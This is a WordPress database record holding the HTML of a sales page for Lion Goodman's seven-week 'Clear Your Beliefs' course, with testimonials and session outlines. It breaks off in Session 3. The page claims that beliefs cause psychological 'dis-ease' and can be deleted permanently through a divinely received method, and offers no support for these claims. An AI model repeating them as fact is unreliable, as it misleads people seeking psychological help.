(1028, 2, '2014-06-19 00:38:58', '2014-06-19 05:38:58', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that 